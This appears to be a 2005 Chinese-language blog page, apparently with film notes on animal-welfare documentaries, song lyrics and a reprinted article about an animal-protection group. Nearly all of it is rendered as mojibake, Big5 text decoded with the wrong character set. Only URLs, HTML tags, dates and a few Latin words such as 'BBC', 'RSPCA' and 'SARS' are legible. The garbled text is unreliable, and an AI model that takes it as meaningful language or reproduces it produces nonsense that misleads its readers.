/>µ£¸¸ּ¡A¦]¬°¦¨­×÷¼ֻ»×¨¨ל­¢®`¡A¦׃¦÷³Qֲש¿ֻ¿ע±ף×÷₪½¥D³z¹L©₪d¥ײ¡uֵ§־¡]Metamorphosis¡^¡v¦¹₪@¡u³q¹L×÷»צ¦¡¡v¡A¼ֶ¦¸¸ױ±´¡A²׳¦׃¿ֶ₪U₪d¥ײ₪ז½´¡Aֵד²{¯u§¡A§ה¨ל©¯÷ײ¡C©₪W₪d¥ײ₪ז½´×÷ֱ|°¦b¬G¨ֶ¸ּµ´«D¥²¶·¡A¦׃¬O·½©ף₪קֵv­¢®`»P¹ןְפ¹ׂ×÷₪£«H¥פ¡C¸m©ס¦²{₪µ×ְ·|¯µ¸¡A«ך¥i¨ֶֿ[×ּ₪ֿ«הµ״ִR¥ײ¯ף¨ׁ»₪§¶¡¡B»P₪k©¦b₪קֵv×ְ·|µ²÷c¸ּ¨¨ל×÷»ש­ָ®_¨מ¡B¥H₪־₪ע¥ײ°×«©ׂ¾D¨×÷₪£₪H¹D¹ן«₪T×ּ×ָµ²×÷¦]×G¡C¦׃°¦³±µ¨₪Hֳ‏¦¨­­ל¥»×÷­±»×¡A₪~¯א§ה¨ל©ZµM×÷©¯÷ײ¡A¬G¨ֶ¦p¬O»¡¡C <br /> <br /> <br />¡³÷Gµ´₪H¾ָ×÷®ֹ©|¡@¨C¥ף¥ײ¯ף³£´»ֵ¡]»²¾ֹ¯ֵ¡^ <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/07-2.jpg"> <br /> <br />₪ש¦W¡G¡m÷Gµ´₪H¾ָ×÷®ֹ©|¡@¨C¥ף¥ײ¯ף³£´»ֵ¡n <br />§@×ּ¡G¥xֶW°×«×ְ·|¬ד¨s·| <br />¬צ¿‎₪ש¡G17₪ְֱִ¡]»²¾ֹ¯ֵ¡^ <br /> <br /> <br />²{¥N₪w₪£¬O¦ׁ¬G¨ֶ¸ּ¡u»P×ך¿ׁ¥ײ¡v×÷®ֹ¥N¡A¨÷¦~¥N₪w¸g¹L¥h₪F¡Aִ©ף¨÷¦~¥N×÷¡A₪H§@¬°₪@÷״»­n·i°«¨D¥ֽ×÷°×«¡A¡u«i®נ¡v¶H¼x₪w₪£´_¨£¡]¹N½׳¨÷÷״¡u«i®נ¡v₪´»­n³Q²׃½o°Q½׳¡^¡C²{¦b₪Hֳ‏»R§ֻµY·ד÷¡¥״×÷×Z¾¹»P»ֵ¦D¡A¥H÷j₪f«µµL×k¹¥₪ֶ×÷³¥¥ֽ°×«¡A¥־¥}ֵ¢¥H₪־²§₪ֶ×÷§N÷z¹ן«¥i¸ז¾i×÷¬ִR₪ע¥ײ¡C²{¥N₪w₪£¬O¥_₪ט¨־₪Hµ´¥@¿W¥×÷®ֹ¥N¡A²{¦b×÷₪H­ּ»qµ₪d×ק¸¦b§N®נ¾ק¹Bֲא₪£¥נ×÷«n°ך«°¥«©׀¶¡¸ּ¦ֵ¦a±i±ז¡]ֱ@¡I§»qµ°×«×÷´ְe¥ײ₪ע¡A§¦h¬ִR¡I¡^¡C×ס¦~¨׃¡A°«O»P°×«÷ײ§Q·Nֳׁ©ןְY¡A½ׁ¦h°ך®a₪w©ת¥O¸T₪מ₪H₪u¹}¾i₪ע¥ײ°×«¡F¥‏²y₪ֶ₪U¡A¯¥F°×«÷ײ§Q×k¥O×÷₪₪°ך₪j³°¦¨¬°¥‏²y³ּ₪j¥ײ¯ף¥ֽ²£₪־¶T©צ°ך¡C¥»₪ש©חִב₪F₪₪°ך₪j³°¥ֽ²£¥ײ¯ף¹Lµ{¡A³ּ¥O₪H₪£§װ¨ע½ה¦׃¾_ֵו×÷¬O₪@¹ץׂF÷µ³Q¬¡¥ֽ¥ֽ­י¥ײ×÷µe­±¡A¹L«בׂF÷µ₪´¥¼®נµ´¡Aְ±¯d₪§»½w½w¦^­÷¡A·¥÷µh·¡¦a¬µ¦₪v³Q­י¥h¥ײ½§¡B¦ו¦׳¼ׂ½k×÷¥‏¨­¡A₪@ֲש¯Q¶ֲµL§i×÷²´¡A¯םµMµL×k²z¸ׁ©ׂ¨£¡C¦h₪ײ´»ֵ°²¬ִR₪§¦W¦ז₪§¡Aֲאְ‏¶¡¥ֽ©R¦ַ­¸´ף·ְ¡C <br /> <br /> <br />¡³©ס₪U´»ֵ×÷·O´d ©µ´°׃·~₪ֶ©ס¥ֽ (´¶¹M¯ֵ) <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/12-1.jpg"> <br /> <br />₪ש¦W¡G¡m©ס₪U´»ֵ×÷·O´d ©µ´°׃·~₪ֶ©ס¥ֽ¡n <br />§@×ּ¡G¥xֶW°×«×ְ·|¬ד¨s·| <br />¬צ¿‎₪ש¡G17₪ְֱִ¡]´¶¹M¯ֵ¡^ <br /> <br /> <br />¥»₪ש¬°¥xֶW°×«×ְ·|¬ד¨s·|©ף2004¦~₪E₪כ§¹¦¨×÷¬צ¿‎₪ש¡A¬צ¿‎¹L¥h¨ג₪T¦~¶¡¥xֶW©v±׀©ס¥ֽ³ץ´÷¡Cµe­±¸ּ₪Hֳ‏±ִ¶R³½³f¡A³½ֳ‏¡B°Fֳ‏¡B¿ְֳֹ¡Bהב¡B³¹³½¡Bְs½¼µ¥µ¥¡A¦A·f²מ¨ל¥~®©ס¥ֽ¡C₪@ֵ¢ֵ¢³¾¨א¡A¾ײְ½¦a¹ֲֻר³ִW¡A₪W₪ט©v±׀¹־ֵי¶i¦ז»צ¦¡¡Aֵx¦ּ¡]©ס¥ֽ«e¡uֵx²b¡v¡^¡A©ס¥ֽ®ֹ₪@ֳה©װ´£³¾¨א¯ֽ»H¡]₪ֿ¦V¡^₪f₪₪°ב°ב¦³µ¡G¡u×ְ±×¦ע¡ATT¡C¡v¦³©ס¥ֽ×ּ»¡¡G¡u¹Lµ{₪₪×÷¶ֻ₪`¡A¬O°×«¦₪v×÷·~¡I¡v³¾¡Bµל¡B³½¡Bְt©ס¥ֽ«eֱ±o¶°¦X¡uֵ¥×k¡v¡A₪j¶q°×«³Q±ף©ס¶ֹ­ֻ¦©T©wְפ¹ׂ¡A₪£²ֵ¦X¥ֽ׫­׃ֵי¹ן¥ֽ¦s×ֵ¶¡×÷»¨D¡A¥ח¼vֵT·ם¦a¥ֽ÷A¬ֶ¹d¡C¬ֶ©־¨£¨ל¦b§ײ³t¹D¸פ₪U×÷·ֻ¸ּ±ף©ס₪j¶q¥ֽ׫¡]₪µל¡B×dִֿ¡Bֱֵ³½¡B©ס¥ֽ®ֹ©ֲY¦a÷¡₪ׁ­¸»R×÷°Fֳ‏¡^¡A·ֳֻה³B³B¥i¨£¦÷₪`÷}¯B¡A¶ֹ¨ט¥§Y¦³₪H¨׃¡u¦^¦¬¡v³Q±ף©ס¦׃©ְYֲא¦V×÷¥ֽ׫¡C¼ֶ­׃©v±׀¹־ֵי¦b©T©w¼q¦t»פ»E¡u©ס¥ֽ¡v¡A¦³¨ַ³¾¨אֵו·W­¸ֲ«¡A¦³¨ַ¦­₪wגf©Rֵ¢₪₪¡A¦³¨ַ¨¶ֻ×÷³¾¨א¨¨ל₪Hֳ‏©ח¥´ֵ¢¾ְֵוְ~°_­¸¡A«o₪S¸¨₪J¼q¦t®ַ₪H³y¦ְ¸ּ·ְִֵ¡C¨ַ³\¹־ֵי¡u₪°»ע³£©ס¡v¡AµL¬r³D¡B¬r³D¡A₪s¸פ±Y¾ְ®ַ­ֻ₪F«K¬O¡C₪׳¦³¬ֶ×ּ¡A°}®e¯E₪j¦a¦b¡u¥×ש¬¡³½²½¡v´ֱ¶¡¡A©ף¥×ש₪פ®w₪j©ס¾i´÷®³f¡C¡u©v±׀©ס¥ֽ¡vֵkµM₪w¦¨©v±׀®ַ×ש²£·~¡AµL½׳¬O¯d¸m°×«×÷®e¾¹¥}ֵ¢¡A©־¬O¹ך»©v±׀©ס¥ֽ¹Lµ{¸ּ¹B¿י°×«®ֹ¨ֿ¥־×÷¿י°e÷µ¥µ¥¡A³£₪w¦³¼ׂ¨ד₪j¶q¥ֽ²£¡A³W®ז²־₪@¡C¾ד®M©ס¥ֽ¡u÷פµ¸¡v----¾i´¡B®·®»¡B¹B¿י¡B¶R»P©ס¡A´N³o»ע¶g¦׃´_©l¡C¾ק±ס¦¡¦׃¬¨ה¦W×÷¡u©ס¥ֽ¡v¡A×ֵֹU½ׁ¦h¥ֽ׫¹ןְפ¹ׂ₪־¥ֽ²z½ױ¾A»¨D¡AְH·N¶ֹ­ֻ©ֲY×e®¡A±ף©ס₪s×L¡A­P¨ֿ¥ֽ׫¦]ְפ¹ׂ°¿ֵ₪£¾A¡A©־ֵי₪÷ְ£₪OµL×k¥­¿ֵ¦׃¦÷₪`¡A₪@®»₪@©ס₪§¶¡¡A¦h₪ײ¥ֽ©R¥­¥ױ§י·l¡C₪ש§ְ¦r¹ץ©ׂ°¬ֶ¬O¡A§ל»P©ס¡B¶R»P½ז¶¡¡A½ײ×÷ִכ¬¹¡H½ײ×÷¥\¼w¡H <br /> <br /> <br />¡³©ס¥ֽ³¾®·§ל¶R½ז¯u¬ (´¶¹M¯ֵ) <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/13-1.jpg"> <br /> <br />₪ש¦W¡G¡m©ס¥ֽ³¾®·§ל¶R½ז¯u¬¡n <br />§@×ּ¡G¥xֶW°×«×ְ·|¬ד¨s·| <br />¬צ¿‎₪ש¡G6₪ְֱִ¡]´¶¹M¯ֵ¡^ <br /> <br />±µִע¡m©ס₪U´»ֵ×÷·O´d ©µ´°׃·~₪ֶ©ס¥ֽ¡n¨t¦C¥DֳD¡A¥»₪ש»EµJ©ף´¦¥©v±׀©ס¥ֽ­I«ב×÷₪j³W¼ׂ°׃·~₪ֶ¾§@¡A¥H³¾ֳ‏¾D¹J¬°¨ׂ¡C₪ש×ל¨ג¬qµe¥~­µ¹q¸³X½ֽ²M´·¦a¥ז«₪F©ס¥ֽ³¾°׃·~₪ֶ¾§@¼ׂ¦¡- -----«n³¡₪j¶q®·®»³¥¥ֽ³¾ֳ‏¥H¨ׁ³f·½¡A©־¬O±µ¨ל¡u­q³ז¡v«ב¬£₪H®·®»¡B÷״ֳ‏»פ¥‏¡A¥]¬A³ֲ³¶¡B₪K­פ¡B÷סֲ¸²´¡B¥ױְY¯־¡B´³¹§¡B¶ֲ¼Lµ§¡Bֲֳֵױףנ¡B₪sֲµ¥µ¥¡A₪j¶qֱ¶R¥i¨ֹ§י¦©¡]¼ֶ¥H₪d¦­p¡^¡B¦³®ֹ§י·lֵו₪H¡A¦p¬Y¨ַ©u¸`®·®»³ֲ³¶¹L¥b¦÷₪`¡B±ף©ס¦ל¸m«D³¾ֳ‏­ל¥»´ֿ¦a¡C₪ש₪₪²M·¡©חִב₪@³B¸ֹ³¾³ץ©ׂ------¾ד₪ש¾נ×L₪₪¶¡¡A¬נ₪a×÷₪@₪ט₪פ×d¾Q¥­¦a¡A¦a₪W₪@₪j±i¦׳²´ֳר¿כ×÷±K±K²׃÷פ¡A¶¡¼»»₪®ֶ¡A³¾¨אµyµy°±·²«K·|ִס§x₪£±o²ז¨­¡C³¾ֳ‏³Q¸ֹ§ל¦«n³¡₪j½L°׃«ב¡A₪@ֵ¢ֵ¢×÷©ס¥ֽ³¾´N³o¼ֻ¸g¥ׁ¥xֵK¹B°e¡]ֵ¢₪₪¬ֶ¦¦³¦׀ֱl¥¼ֲ׳×÷ֲת³¾¡^¡A₪@¨®₪S₪@¨®¡A¦¥‏¬¦U¦a¡A¨ׁ»₪§¶¡₪«µM¦³§ַ¡C­±¹ן³o¯כ´÷×p¡A₪£¸T¨ֿ₪H÷ֳ°¡A¥xֶW×ְ·|¨ל©³¥X₪F₪°»ע°ֳD¡A»­n¥H¦¹÷״₪ט¦¡¡uֵ«¸o¡v¡B¡u°µ¥\¼w¡v¡H¡]¯u¹³¥y©ו¦H×÷·s»D¥xµ¡A¥R÷¡₪FֱB´|³y§@¡AµM²{¹ך³÷´N¬O³o¯כ©ו¦H»PֱB´|³y§@©־¯מֲױ¡C¡^µLµר©ף₪jµ²÷c°׃·~₪ֶ©v±׀©ס¥ֽ₪~¾ֹ­P¦¹÷״¡u¥‎§ל§¥}¸T¡A¦A¶R§©ס¥ֽ¡vֵ¬¦ז¬°¡A¾÷·~×ּ­±¹ן¶R³¾×ּ×÷÷ֳ´b¡A¬ֶ©־ֲױ½׳¦a¡uִµִU¡v¦w¼¢©v±׀©ס¥ֽ×ּ¡G¡u§A¶R¨e©ס¥ֽ¬O¹ן¨e¦n¡A°µ¥\¼w¡A³¾­Y¦÷₪`«h¬O¨e¦¨­×÷·~»¡C¡v₪ש§ְ¦r¹ץ¨ּµM°×÷¬O¡G³o¼ֻ×÷©ס¥ֽ¡A¬O¥\¼wֱ¬O³yִ^¡H <br /> <br /> <br /> <br />¡³§ץ²E¶§©רֲ־°O (´¶¹M¯ֵ) <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/06-2.jpg"> <br /> <br />₪ש¦W¡G¡m§ץ²E¶§©רֲ־°O¡n <br />§@×ּ¡G§ץ²E¶§ <br />¥ֽ÷A¬צ¿‎₪ש¡G60₪ְֱִ¡]´¶¹M¯ֵ¡^ <br /> <br /> <br />¦~₪ײ®ֹ¨×k¥¬÷¸¡m©רֲ־°O¡n±ׂ»X¡A1968¦~°_¡A§ץ²E¶§¥H₪K¦~®ֹ¶¡¦¶O©חִב¥xֶW²ִ₪@³¡©רֲ־¥ֽ÷A¬צ¿‎₪ש¡C1975¦~­^°ך¼s¼½₪½¥q¡]BBC¡^´¿¦]¨ה©חִב₪פ·ַ·¥°×¡A¯S¨׃¥x±M³X¦³¡u¥xֶW×k¥¬÷¸¡v₪§÷×÷§ץ²E¶§¡A₪־¨ה©ף¼v₪ש₪₪ְְ¦µMְפ¹ׂ¥¬¸m¦׃¦¨×÷¹ךֵח³ץ©ׂ¡C¨ה¹ן©רֲ־¦ז¬°¡Bµe­±²׃¸`©ְ¯ק¦b¯ק¡A¯׃®ֹ¶O₪י×÷©חִב₪ט¦¡¡A³y´N₪F·ם¦~³Q¥@¬ֹ×¾¦W×÷¦µM¬ל¾ֲַר»x¡m¥v±K´ֻ¥§¡n¡]Smithsonian¡^ֵA¬°¡u¥v¸ײ¡v¯כ×÷¹q¼v¡C₪T₪Q¦~«ב­«·s°ֵ¿ט¦׃¦¨×÷¡m§ץ²E¶§©רֲ־°O¡n²׳¦׃§e²{¥xֶW₪j²³²´«e¡C <br /> <br />¥»₪ש₪ְ₪T³ז₪¸¡G¥ֽ»P·R¡B₪£¥i«הִ³×÷¥ֽ¦s³N¡Bֲ־₪§₪¡C§­ּ¬¨£³¥¦aֳַ»s§@₪F·R×÷₪j»זֳ״»P»ֲ־¥H«K¶¶§Q¥ז§ְ¡A×ך¯Z¸ֱ¿v±_¦³¦p×d₪פ¦Kµ·²@₪£©ל×d±a₪פ¡A·nִxֲ־¦p¦ף¥־₪W¥‏¨­×ֵֿי¡A¥©¹₪ׁ₪u¦a±²÷c³yֱc½ֶ×÷¸­­c·nִx¡A¨ה÷כ±K×÷­p÷ג¡A¬y÷Z×÷×ֵֿיֳ‎«¡A¾»¡±q«e´¿¨ֶֿ[¼v×ֵּו¹ִ¡G¡u³o®¥»¬O₪H¹ְ¡I¡v₪@¹ץ¹ץֵד¥©רֲ־¥ֽ÷A¦ז¬°¦h¼ֻ¡A¨D¥ֽ®ֱֹ׳¼ִ¡B°°¸ֻ¡B°²¦÷¡B¦@¥ֽ......¡A¨D·R®ֹ±µ×ס¡B₪»₪¡BֳJֳ״......¡A¿v±_ֵ@¥®®ֹ®ן®ן₪ֱ₪ֱ¡B¦ׂ¼{³ֶ¦......¡A³o©רֲ־ש×÷¡m·¡×ש×÷¥@¬ֹ¡n₪£¸T¨ֿ₪H·t·t¹ִ×A¡A״׳­Y²ִ₪G₪ׁ¿פ¨׃¦¨­ֵ¦¨₪F₪@°¦ֲ־¡A×׃­t¨÷¨ַ¨D¥ֽ¨D·R¿v±_ֱc­l₪u§@¡A¯א°µ×÷₪ס¯u¥¿×÷ֲ־¨׃×÷¦n¶¡H§ף¨ֿ₪H¶i₪@¨B₪ֿ«ה¡A₪Hֳ‏¸׃±j¥[§כ®g₪Hֳ‏¦ז¬°×÷×ְ·|₪ו₪ֶ·N¸q₪_«D₪H°×«¡A©־¬Oֱ¾ֱ¾»ג·|³o¨ַ¦ז¬°×÷¦P·½©©O¡H <br /> <br />¨e­ּ«ה¦ׂ¶¡H·|¼ֶ¼ֶ¨א¶¡H·R¶¡H¶ֻµh¶¡H¼v₪ש´¦¥₪F¬Y¨ַµo₪H²`¬×÷µe­±¡A¦‎ְHµ¼v₪שµe­±¨B¨B₪»גֶ[×ּ×ס¿s°ף¶ר¡A¼v₪ש®ַ¥ױֵ¥¨׃«o¦³¨ַ₪Hֳ‏₪₪₪¡A¬ֶ©־±a¦³©§O¨ט×O¦L¶H¡]­t₪lֲ־¶¯ֲ־­t§Z¡A®ַ¥ױ¼J§ֻ¦a»¡µ¡G¦uֵ@§Z×÷₪u§@¡A¦b­t₪lֲ־¨׃»¡¡A¬Oרר×÷³d¥פ¡C¥L§ג§Z­I¦b­I₪W¡A₪י©]³£₪£©ס₪U¡C«z¡A°ף°ף§@רר×÷¡A«ח»ע·|ֵ×÷³o»ע¥i¼¦©O¡H¡^¡A»×¦ֱֽ×ס«ֶָ[×÷µר¨₪±´°Q©רֲ־¦ז¬°µ¦²₪®ֹ¡A¦³®ֹ³÷§N÷z¦a¬v·¸µ¨ַ³\¦±¸ׁ´»ֵ¡]©רֲ־®·­¹©רֲ־µe­±¡A®ַ¥ױ¡G¬¡I«e­±¦³₪@¹D«¦n¦Y×÷₪pµז¡C«z¡I³o¬O₪W₪ׁ×÷ֲ§×«¶¡H«ָ®נ₪°»ע¡I¦b³o­׃¥@¬ֹ₪W¡A₪£´N¬O¦Y©־³Q¦Y¶¡H¡^¡CְHµ¨÷×x¶ְ×÷¡BֳM³ז¨®±a¸ֱ±y±y«e¦ז₪@₪½¨½¥b±ף©ס¡u°µ¹ךֵח¡v×÷µe­±¡A¥H₪־®ַ¥ױ¨ַ³\¬ְ¸·N¨‎×÷¿³¾ִ¡]ֱ¨S¦^±_¡A¨e¦÷₪F¶¡H¡^¡A2005¦~×÷²{¦b¡A₪ֶֿ[₪T₪Q¦h¦~«e×÷¥ֽ÷A¹ךֵח₪ט×k»P©חִב­²z¡A¦A¦A´£¿פֶ[×ּ¡A¥»₪ש§@¬°₪@´­¦W°ך»₪§¥ֽ÷A°O¿‎¡A·¥¨ד·N¸q¡A®ַ¥ױ·ו₪£±»·ל¡AµM¨ה₪₪¬Y¨ַ·t¥©×÷»ש­ָ§ב¦±±j₪ֶ¡A»P¼v₪ש©חִב¦~¥N«ֶָ[ְפ¹ׂ­­¨מ³y¦¨×÷¥ֽ÷A¹ךֵח­²z°ֳD¡A«o₪]¬Oֶ[¼v®ֹ₪£¥i₪£·V₪§³B¡C <br /> <br />¡]¥¼§¹¡A«ִע¡^ - http://www.upsaid.com/isis/index.php?action=viewcom&id=217 - isis - 2005-10-19T22:58:55+07:00 - 0 - - - ¡Cְ³¸׃ - ®ַ¥ױ: <br /> <br />¡y¬O×÷¡A₪£½׳«צ¬ֶ»ע¹D²z¨׃»¡§³£ְ³¸׃·R§A¡C <br />½׀­ל½ּ§¨ֿ¥־₪F¡uְ³¸׃¡v³o­׃µ......₪H­ּ§i¶D§°µ¨ל₪F¡uְ³¸׃¡v₪~÷ג§@³W³W¯x¯x¡A³s₪£¨²z©₪ה°t×÷·R₪]³W©w±o©ת©ת¥ױ¥ױ¡C¡u¥@¬ֹ₪W¨S¦³µL½tµL¬G×÷·R¡v³o±ר±׀¾ֹ¨ֿ¨C­׃₪H°±¡₪§«e³£­n°µ₪@µf×ְ·|×÷¦ׂ¼{¡C <br /> <br />§×÷×÷½T½T´¿«צ·׃®ׁ¥»₪W³ר¯ָ₪W¹ן§×÷±׀¨|¦ׁ¦ׁ¹ך¹ך¦a·R¹Lµ¹§³W©w×÷¡uְ³¸׃¡v·R×÷×F¦ט¡A¦‎³ּ²׳§¡uְ³¸׃¡v·R×÷×F¦ט«o¨ֿ§¹¡¨§י¿i¡C <br /> <br />±q¦¹¥H«ב§₪£´±¥h·R¡C <br /> <br />.... <br /> <br />«ב¨׃»P¨ה»¡§¦b¥|³B§ה´M¥i·R×÷₪k₪H₪£¦p»¡§¦b·¥₪O·Q½ױ°¦¨­₪₪¨÷÷״©|¯א·R§O₪H×÷·Pִ±¡C <br /> <br />¬O×÷¡A§A¬O₪@­׃¥i·R×÷₪p×F¦ט¡A₪£½׳±q­‏₪ט­±¨׃»¡§³£¡uְ³¸׃¡v·R§A......§¡u₪£ְ³¸׃¡v÷R´§A¡A¶d­t§A¡A¨ֿ§Aֵוְ~©M¶ֻ₪¡C¦‎§§S¹M₪F¯½£¸ּ¨C₪@­׃¨₪¸¨³£µo²{₪£₪F¨÷¥ק­n¥Iµ¹§A×÷·Rֲֳ¦b­‏¸ּ¡A¦p¦P×F₪ט×÷®נ¥\®v¨₪F­«³׀«ב¦b¥Lֵי₪÷´£₪£°_¥L×÷®נ¡C¡z[more...]ְ³¸׃¦³´X÷״ְ³¸׃¡H <br /> <br />ְ³¸׃ֲYµw¹פ¨M©wְ³¸׃¬O­‏­׃ְ³¸׃¡Aµw¹פְ³¸׃°±₪מ×÷®ֹ­װ¡Aְ³¸׃¦³´X¦¸×÷¥ֳ«ם₪S¦^¨ל₪F°¸µM¡Hְ³¸׃¦³´X¦¸×÷°¸µM¦¨´N₪F¥ֳ«ם¡H¥ֳ»·ְ³¸׃¥i¯א¡Aֱ¬O¥i¯אְ³¸׃¥ֳ»·¡Hְ³¸׃¿ן¾¡A§ם©־¿ן¾ְ³¸׃¡H <br /> <br />ְ³¸׃₪ׁ²P®¨₪¡Aְ³¸׃°hֱפ₪s×L¡Cְ³¸׃÷}¬v¹L®¡Aְ³¸׃¬~¥h­·¹׀¡Cְ³¸׃»¡¡Aְ³¸׃₪£»¡¡C <br /> <br /> <br /> <br /><b>ְ³¸׃</b> <br /> <br />§@µ¡G³¯¬ְ©g¡@§@¦±¡G³¯¬ְ©g¡@½s¦±¡GMonster <br /> <br />ְ³¸׃¬O©ָ₪F±I¹ז¡@₪~¾ב₪¹L₪F©ת₪ׁ¡@§A±N¬נµM¨Hְq <br />·L¯÷µ¨M©w¸׃ֲק¶}§¡@ֲק¶}§ <br /> <br />ְ³¸׃¬O·Q±o₪׃¦h¡@₪~ֳh÷ֳ¨C­׃₪µ₪ׁ¡@§­ּ³£ֵ³n®z <br />¨ל®ֹ­װ₪£×¾¸׃«ח»ע»¡¡@«ח»ע»¡ <br /> <br />ְ³¸׃·Rµ§A÷ע÷ע´₪§A×÷₪ג¡@ְ³¸׃©ךµ§A±q¦¹₪£ֵ‎§A¨« <br />ְ³¸׃¬O½m²­I«q¡@₪ס·Q¹³₪₪×÷ֲ²³ז <br />§A¹ן§×÷¨ּ¿א¡@³÷ֵ¦¨³ִּY¼F×÷­t¾ב¡@«ח»ע¿ל <br /> <br />ְ³¸׃¬O«ז©ף±ְֲ½¡@¥H©¹÷״÷״×÷₪£¦w¡@₪~ֲַ₪f¬°₪F§A <br />₪H¥ֽ­«·s³]©w¦A­«¨׃¡@­«¨׃ <br /> <br />ְ³¸׃·Rµ§A÷ע÷ע´₪§A×÷₪ג¡@ְ³¸׃©ךµ§A±q¦¹₪£ֵ‎§A¨« <br />ְ³¸׃»´»´§k§A₪£ֵ‎§A»¡¿ש¡@ְ³¸׃ְRְR¦u¦םµ¹§A×÷©׃¿ױ <br />ְ³¸׃¶Xµֱ¦~»´¦n¦n·P°¡@ְ³¸׃§ג´₪¨C¦¸²´¯«×÷¥ז¿ש <br /> <br /><a href="http://twblog.no-ip.info/isis/music/yang-should.mp3" target="_blank">ְ³¸׃»¡¡@ְ³¸׃°µ¡@ְ³¸׃·R¹L´N§װ¦ם₪£©ס§A¨«</a> <br /> <br /> <br /><b>ְ³¸׃</b> <br />µ¡‏¦±¡‏½s¦±¡G³¯¬ְ©g <br /> <br />₪f¬ץֳC¦ג¥R÷¡»₪´b <br />ְ³¸׃§k§ <br />³o¸ּ®נ×^¦³ֲI¾®­« <br />ְ³¸׃³°s <br /> <br />₪±¡¥O§AµL×k®»÷N <br />ְ³¸׃³­§ <br />¹q¼v¨כ¿E₪S½ז®y <br />ְ³¸׃₪£¯א¿ש¹L <br /> <br />¦§@ֱo©ת×÷³ֳ¥כ <br />¥H¬°¦₪v₪°»ע³£ְ´ <br /> <br />§A»¡§Aְ³¸׃·R§ <br />§»¡§Aְ³¸׃ֵ‎§¨« <br />₪]³\§Aְ³¸׃¨÷»ע·Q <br /><a href="http://twblog.no-ip.info/isis/music/chen-should.mp3" target="_blank">¦‎¬O§ְ³¸׃³o»ע°µ</a> <br /> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=216 - isis - 2005-10-11T23:32:57+07:00 - 2 - - - ¡CµL¦k₪§¨a - ₪H₪£¶}₪×÷®ֹ­װ¡A¯«¥P·|»¡¹ך¸¡C₪j¯÷¹L«ב₪£±o₪£¦¼J¡A¯«¥P¯uֵי¶K§¡A»¡₪F₪½¹D¸¡C[more...]µL¦k₪§¨a¡D©־ֳ´₪§₪¡D¦ז₪H₪§±o¡D¨¶₪H₪§¨a¡D <br /> <br /> <br />¦n§a¡A§ֶ±ז₪µ₪ׁ¬O₪£­ֻ·°×÷₪@₪ׁ¡C - http://www.upsaid.com/isis/index.php?action=viewcom&id=215 - isis - 2005-10-07T00:26:59+07:00 - 4 - - - ¡C§­ּ»­n£z₪@ £¾ - <a href="http://www.pots.com.tw" target="_blank">¯}¶g³ר</a>´_¥Z 379 ´ֱ½s¿ט«ַ₪ג°O <br />(2005.09.28)[more...]¡m§­ּ»­n£z₪@ £¾¡n <br /> <br />₪ו / ±d¹חִֹ <br /> <br />µS°O₪­¦~«e±ִ³X°×«×ְ·|¬ד¨s·|¡A₪@­׃÷כֲ²«o±׃©ף¦ז°×÷¥|₪HNGO¡]¥i°ׁ¦ׂ¯}¶g³ר´_¥Z132´ֱ¡A±d¹חִֹ¡A¡q¨ָ¬w¦a°ֿ«D¬F©²²ױֲ´³ױִ‎·|¨t¦C³ר¾ֹ₪C----°×«×ְ·|¬ד¨s·|»P¨÷­׃¾ַ÷²z×÷¥X®a₪H¡r¡^¡C¨ג₪T¦~«ב₪הֱ~₪H­¼ֶ¶q´מ₪ײ50%¡A₪@¸s¸q₪u¦¿ׁ¥ֽ¬¡«o₪]₪´¨V¨V©ף¨ף·|¨ֶ°ָ¡C₪S¹L¨ג¦~¦h×÷²{¦b¡A₪½³¡×ש¸ֹ§U₪£¨¬¡A°«Oִ³ֳD¡B¦ז°¦¸¼ֶ»P₪י­ׁ¼W¡A¦׃₪הֱ~₪H­¼ֶ¶q¬°¹s¡C <br /> <br />°×«×ְ·|¬ד¨s·|×ר´ֱֳצ×`₪Hֵv¡B°×«ֵv¡Bְפ¹ֵׂv©M¿׃₪¬°¡AµL½׳¬O¥xֶW¥»¦a×÷¬y®צ°×«¡B¸gְ°×«ִ³ֳD¡]°×««Oֵ@×k¡B₪H¬°±ף¾i×÷¬y®צ°×«¦b¦¬®e©ׂ¨­h¡B¸gְ°×«¨p®_.....¡^¡A©־¥‏²y₪ֶ»P¸ך¥»¥D¸q₪j¦ז¨ה¹D«ב¡A¸gְ°×«»P³¥¥ֽ°×«©ׂ¾D¨×÷₪£¸q¹ן«¡]₪j³°÷µֱx»s«~¡B´»ֵ¥ײ¯ף......¡^¡A ₪Hֳ‏ֵ¹­¹³¥¨‎₪µo¯e¯f®£·W¡]SARS«ב₪Hֳ‏¹ן°×«×÷×¼¥״¼³±‏»P®£·W ¡^¡A ₪D¦©ף₪י·U©תֵד×÷¹ךֵח°×«­²z°ֳD¡C®´׃¥xֶW¡A¿n·¥¦ךֱp¥‏²y°«O¡B ְפ«O¡B₪Hֵv¹־ֵי¡A¥ר¹ֿ³ך°_§ף¦hֳצ©ף₪Hֳ‏¹ן«ְפ¹ׂ»P¨ה¥L°×«₪ט¦¡×÷₪ֿ«ה¡AֲX®i¹D¼w°י₪l¡A¦׃²׳₪ֿץX©ף₪Hֳ‏¹ן«₪Hֳ‏¦¨­¡C <br /> <br />°×«×ְ·|¬ד¨s·|´¿¦¶O½׀­^°ך RSPCA ₪H­¨׃¥x¡A¨ף§U°V½m¥xֶW°×««Oֵ@ְֻ¬d­¡A¥H¸ֹ₪½³¡×ש¬Fµ¦₪£¨¬¡C´¿´£¿פ¥xֶW©~¥ֱ¨p®_¦׳ֳ‏¥i¯א¾ֹ­P×÷¯e¯f¡A»P¨ה­I«בֲA¬°₪H×¾×÷¶ֲ¥«¾§@¡] °×«×ְ·|¬ד¨s·|¦¨­¥ח¦]¦¹¾D¨®£ְ~ֲִּZ 